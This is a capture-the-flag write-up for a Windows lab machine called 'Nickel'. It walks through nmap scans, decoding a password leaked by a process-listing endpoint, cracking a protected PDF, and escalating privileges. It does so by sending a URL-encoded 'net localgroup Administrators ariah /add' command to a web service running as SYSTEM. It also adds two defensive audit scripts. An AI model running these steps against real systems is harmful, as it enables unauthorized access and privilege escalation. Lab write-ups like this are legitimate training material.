# Nickel

## Summary

### General information

|             |                                               |
| ----------- | --------------------------------------------- |
| **Level**   | <mark style="color:orange;">Intermediate</mark> |
| **System**  | Windows                                         |

### Spoiler! - Roadmap

A very simple machine in which leaked credentials are obtained from a file on an exposed web service. Those credentials are then used to log in over ssh and retrieve a PDF with interesting information: it describes a web service that runs with administrator privileges and through which commands can be executed.

The steps are listed in more detail below.

1. Service enumeration, finding a web service with an endpoint that shows information about the credentials of user `ariah`.
2. Access over ssh and retrieval of a password-protected PDF file from the `ftp` service's folder.
3. Cracking the PDF file and recovering its password with the `rockyou.txt` wordlist.
4. Information in the file about an endpoint that allows command execution as `nt authority\system`.
5. `ariah` is added to the administrators group and `PWNED!`.

## Enumeration

### nmap scan

Basic enumeration of all services over TCP, UDP and SCTP:

```bash
IP=192.168.155.99
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Port and service scan with scripts on the Top 1000 ports over TCP and UDP, and on all ports over TCP:

```bash
nmap -T4 -Pn -open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn -open -sU -sV -oA nmap/udp-1000 $IP
```

#### nmap results

The second scan (`nmap -T4 -Pn -open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP`) gives the following information:

```
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
|   256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_  256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after:  2023-08-20T12:02:35
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-current-deployments
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-running-procs
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|_    Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <p>Not Implemented</p>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
```

### Scan analysis

Several URLs and open services are found; after a basic enumeration of each one, an interesting endpoint turns up:

```
http://169.254.109.39:33333/list-running-procs
```

Modifying the request so that it targets the victim machine's IP and uses the HTTP POST method instead of GET, the following is obtained:

```
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

```

```
name        : System Idle Process
commandline : 

name        : System
commandline : 

name        : Registry
commandline : 

name        : smss.exe
commandline : 

name        : csrss.exe
commandline : 

name        : wininit.exe
commandline : 

name        : csrss.exe
commandline : 

name        : winlogon.exe
commandline : winlogon.exe

name        : services.exe
commandline : 

name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : dwm.exe
commandline : "dwm.exe"

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name        : Memory Compression
commandline : 

name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1

name        : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"

name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"

name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"

name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"

name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d

name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : SgrmBroker.exe
commandline : 

name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

name        : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
```

Among this information we obtain a username and a password which, judging by its characteristics, appears to be base64-encoded:

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
```

We decode the string and obtain `ariah`'s password:

```
echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 --decode
```

```
NowiseSloopTheory139
```
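The root issue exposed by this endpoint is that process command lines are readable by anyone who can reach the API, so any secret passed as an argument (here a base64-encoded password after `-p`) is effectively public. The following Python script is an added example, not part of the original writeup nor code from the DevTasks or Powershell Webserver tooling on the machine: it parses the same `name`/`commandline` record layout shown above (including values wrapped onto indented continuation lines), flags credential-bearing arguments with the value redacted and a note on whether it looks base64-encoded, and flags PowerShell scripts started with `-ep bypass`. The sample records, the switch list in `PASSWORD_FLAGS` and the function names are constructed for the example.

```python
import base64
import binascii
import re

# Constructed excerpt in the same Format-List layout as the page's
# /list-running-procs output (blank line between records, long values
# wrapped onto indented continuation lines).
SAMPLE_PROCS = """\
name        : lsass.exe
commandline : C:\\Windows\\system32\\lsass.exe

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\\windows\\system32\\ws80.ps1

name        : cmd.exe
commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : sshd.exe
commandline : "C:\\Program Files\\OpenSSH\\OpenSSH-Win64\\sshd.exe"
"""

# Switches that commonly carry a password value (assumed list; extend it
# for the tooling used in your environment).
PASSWORD_FLAGS = re.compile(
    r'(?:^|\s)(?:-p|-pass|--pass|--password|/p|/password)[\s:=]+"?([^\s"]+)"?',
    re.IGNORECASE,
)
# PowerShell launched with the execution policy disabled on the command line.
EXEC_BYPASS = re.compile(r"-(?:ep|ExecutionPolicy)\s+bypass", re.IGNORECASE)


def parse_records(text):
    """Turn Format-List style 'key : value' blocks into a list of dicts."""
    records, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():  # a blank line ends the current record
            if current:
                records.append(current)
            current, last_key = {}, None
            continue
        if line[0].isspace() and last_key:  # indented line continues the previous value
            current[last_key] = (current[last_key] + " " + line.strip()).strip()
            continue
        key, _, value = line.partition(":")
        last_key = key.strip()
        current[last_key] = value.strip()
    if current:
        records.append(current)
    return records


def looks_like_base64(token):
    """True if token is valid base64 that decodes to printable ASCII text."""
    if len(token) < 8 or len(token) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token):
        return False
    try:
        decoded = base64.b64decode(token, validate=True)
    except binascii.Error:
        return False
    return all(32 <= b < 127 or b in (9, 10, 13) for b in decoded)


def audit_process_list(text):
    """Return findings for credential-bearing and policy-bypassing command lines."""
    findings = []
    for rec in parse_records(text):
        name, cmd = rec.get("name", ""), rec.get("commandline", "")
        for match in PASSWORD_FLAGS.finditer(cmd):
            secret = match.group(1)
            findings.append({
                "process": name,
                "type": "credential-on-command-line",
                "encoding": "base64" if looks_like_base64(secret) else "plain",
                # never write the secret itself to a report: keep a short prefix for triage
                "redacted": secret[:2] + "*" * (len(secret) - 2),
            })
        if EXEC_BYPASS.search(cmd):
            findings.append({"process": name, "type": "execution-policy-bypass"})
    return findings


if __name__ == "__main__":
    for finding in audit_process_list(SAMPLE_PROCS):
        print(finding)
```

Run against the sample it reports the `ws80.ps1` launch with the execution policy bypassed and the `DevTasks.exe` credential, classified as base64 because the token decodes to clean ASCII text; the same parser can be pointed at the output of `Get-CimInstance Win32_Process | Format-List Name,CommandLine` on a host to find secrets exposed this way before an attacker does.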

## Exploitation

### Direct access to the system

Once valid credentials for the server have been obtained, we try them against the available services, among them `ssh` and `ftp`:

```
ssh ariah@192.168.155.99
```

```
ftp ftp://ariah:NowiseSloopTheory139@192.168.155.99
```

### Post-enumeration

A basic enumeration of the system shows a file named `Infrastructure.pdf` in the FTP service's folder.

To download it over SSH:

```
scp ariah@192.168.155.99:C:/ftp/Infrastructure.pdf .
```

When trying to open the file we see that it is password-protected, so we run a dictionary attack with `pdfcrack` using the `rockyou.txt` wordlist:

```
pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/EMNDtcPzthibNVMdTXVR" alt=""><figcaption></figcaption></figure>

The password turns out to be: `ariah4168`

<figure><img src="/files/jVlWs7Wo8eUOq8W9b0KL" alt=""><figcaption></figcaption></figure>

The "Temporary Command" endpoint looks like it could allow command execution; let's see whether we are lucky and the service happens to be running as `Administrator`.

{% tabs %}
{% tab title="Curl" %}
From the SSH session, run `curl` against the *endpoint* with the `whoami` command:

```
curl http://localhost/?whoami
```

The following response is obtained:

```
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}

{% tab title="Powershell" %}
Run the following to switch to `powershell`:

```
ariah@NICKEL C:\>powershell.exe
```

The request is made and the response content is read:

```
$response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
$response.RawContent
```

The following response is obtained:

```
PS C:\ftp> $response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
PS C:\ftp> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 118
Date: Sun, 26 Feb 2023 21:12:33 GMT
Last-Modified: Sun, 26 Feb 2023 13:12:33 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}
{% endtabs %}

## Privilege escalation

`ariah` is added to the administrators group through the endpoint:

```
net localgroup Administrators ariah /add
```

The string is URL-encoded so that it can be sent in the URL:

<https://meyerweb.com/eric/tools/dencoder/>

The command is run and a successful response is obtained:

```
$response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
$response.RawContent
```

```
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>The command completed successfully.

</pre>
</body></html>
```

We verify that the user has been added to the administrators group:

```
PS C:\Users\Administrator> net localgroup Administrators 
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.

```
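From the defender's side, the change just verified is exactly the kind of local-group modification worth auditing. The following Python script is an added example, not part of the original writeup: it parses the text output of `net localgroup Administrators` as printed above, handles the multi-column member listing that `net` prints for larger groups, and reports members that are not in an expected baseline. The baseline set, the sample output and the function names are constructed for the example.

```python
import re

# Constructed sample: the `net localgroup Administrators` output shown on
# the page (prompt removed), now containing one member that should not be there.
SAMPLE_NET_OUTPUT = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.
"""

# Constructed baseline: the accounts expected in the local Administrators group.
EXPECTED_ADMINS = {"Administrator"}


def parse_net_localgroup(output):
    """Return (alias, members) from the text output of `net localgroup <group>`.

    Members start after the dashed separator and end at the
    "The command completed successfully." line; for larger groups `net`
    prints several names per line separated by runs of spaces.
    """
    alias, members, in_members = None, [], False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Alias name"):
            alias = line.split(None, 2)[2]
        elif re.fullmatch(r"-{5,}", line):
            in_members = True
        elif line.startswith("The command completed"):
            break
        elif in_members and line:
            members.extend(re.split(r"\s{2,}", line))
    return alias, members


def unexpected_members(output, expected):
    """Members present in the group output but absent from the expected set (case-insensitive)."""
    _, members = parse_net_localgroup(output)
    allowed = {name.lower() for name in expected}
    return [name for name in members if name.lower() not in allowed]


if __name__ == "__main__":
    alias, members = parse_net_localgroup(SAMPLE_NET_OUTPUT)
    print(f"{alias}: {members}")
    print("unexpected:", unexpected_members(SAMPLE_NET_OUTPUT, EXPECTED_ADMINS))
```

On the sample this returns `['ariah']`. A periodic baseline check like this complements, rather than replaces, real-time alerting on Windows Security event 4732 (a member was added to a security-enabled local group), which would have fired the moment the `net localgroup ... /add` above ran.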

And now the flag on the administrator's desktop can be read:

```
type C:\Users\Administrator\Desktop\proof.txt
```

<figure><img src="/files/L1La7by0vBRsc09Bw5f8" alt=""><figcaption></figcaption></figure>

